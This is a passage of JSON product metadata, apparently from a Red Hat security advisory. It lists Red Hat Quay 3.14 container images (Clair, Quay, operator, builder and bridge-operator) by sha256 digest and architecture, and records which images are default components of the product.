                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3Adb535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1778873585"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel8@sha256%3A9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779689392"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1778873623"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3Ab83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778874087"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3Aeade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1778873627"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3A7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72?arch=arm64\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1778873589"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3A85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1778873585"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel8@sha256%3Aa46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779689392"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "arm64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1778873623"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778874087"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3A0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1778873627"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3A4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1778873589"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3A6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1778873585"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel8@sha256%3Afca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779689392"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1778873623"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778874087"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3Afac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1778873627"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3Ac36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42?arch=s390x\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1778873589"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3A9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1778873585"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel8@sha256%3A4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779689392"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64"
        },
